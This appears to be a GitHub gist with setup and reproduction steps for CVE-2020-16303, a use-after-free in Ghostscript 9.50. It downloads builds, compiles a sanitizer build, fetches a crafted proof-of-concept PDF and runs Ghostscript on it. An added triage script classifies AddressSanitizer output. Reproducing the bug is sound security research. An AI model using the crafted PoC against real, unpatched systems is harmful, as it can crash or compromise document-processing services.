@yunpengn
Last active September 24, 2021 14:24
CVE-2020-16303 use-after-free vulnerability in Artifex Software GhostScript v9.50

Setup Instructions

  • Download GhostScript GhostPDL v9.50 from their GitHub release.
    • You need both the official build and the source code.
    • Official build (without fix): wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs950/ghostscript-9.50-linux-x86_64.tgz.
    • Official build (with fix): wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs951/ghostscript-9.51-linux-x86_64.tgz.
  • Compile from source code in the following steps:
    • Get the source code: git clone git@github.com:ArtifexSoftware/ghostpdl.git.
    • Switch to the correct version: git checkout b5bc53eb7.
    • Make sure you have installed gcc, make and autoconf.
      • sudo apt install gcc
      • sudo apt install make
      • sudo apt install autoconf
    • Run ./autogen.sh.
    • Run make sanitize.
    • The build output will be in the sanbin folder.
  • Download the crafted input file poc.pdf from this page.
    • Run wget https://gist.githubusercontent.com/yunpengn/2a997a30ea798c2a2f1ac2fc89d31106/raw/0296f78472ab6da2f296ab7a0584e47cebd08d74/poc.pdf.
  • Run the following commands to reproduce the vulnerability against each build (release, debug, sanitizer and fixed):
    • ./gs -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
    • ./gs-debug -dBATCH -dDEBUG -dNOPAUSE -dSAFER -dNOTRANSPARENCY -dPDFSTOPONERROR -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
    • ./gs-san -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-san -sDEVICE=xpswrite ./poc.pdf
    • ./gs-fix -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-fix -sDEVICE=xpswrite ./poc.pdf
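A small triage script for the last step, added here as an example and not part of the gist: it runs a build against the PoC with the gist's flags and classifies the run from the AddressSanitizer report and the exit status, so the sanitizer build and the fixed build can be compared in one go. The binary names gs-san and gs-fix and the file ./poc.pdf are taken from the steps above; classify_result and run_build are names chosen for this example.

```shell
#!/bin/sh
# Added example (not part of the gist): classify Ghostscript runs by
# AddressSanitizer output. Assumes the gist's binaries (gs-san, gs-fix)
# and ./poc.pdf are in the current directory when run_build is used.

# classify_result LOGFILE EXITCODE
# Prints one of: uaf, asan-other, crash, error, clean.
classify_result() {
    log="$1"; rc="$2"
    if grep -q 'ERROR: AddressSanitizer: heap-use-after-free' "$log"; then
        echo uaf                      # the CVE-2020-16303 class of bug
    elif grep -q 'ERROR: AddressSanitizer' "$log"; then
        echo asan-other               # some other memory-safety report
    elif [ "$rc" -ge 128 ]; then
        echo crash                    # killed by a signal (128 + signo)
    elif [ "$rc" -ne 0 ]; then
        echo error                    # ordinary Ghostscript error exit
    else
        echo clean
    fi
}

# run_build BINARY PDF LOGFILE
# Runs one build with the gist's flags (output discarded) and prints
# "BINARY: <classification>". set -e safe: the exit code is captured.
run_build() {
    bin="$1"; pdf="$2"; log="$3"
    if ASAN_OPTIONS=detect_leaks=0:halt_on_error=1 \
        "$bin" -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY \
        -sOutputFile=/dev/null -sDEVICE=xpswrite "$pdf" >"$log" 2>&1; then
        rc=0
    else
        rc=$?
    fi
    echo "$bin: $(classify_result "$log" "$rc")"
}

# Only run the real binaries when they are present; expected result is
# "./gs-san: uaf" and "./gs-fix: clean".
if [ -x ./gs-san ] && [ -x ./gs-fix ] && [ -f ./poc.pdf ]; then
    run_build ./gs-san ./poc.pdf san.log
    run_build ./gs-fix ./poc.pdf fix.log
fi
```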

References
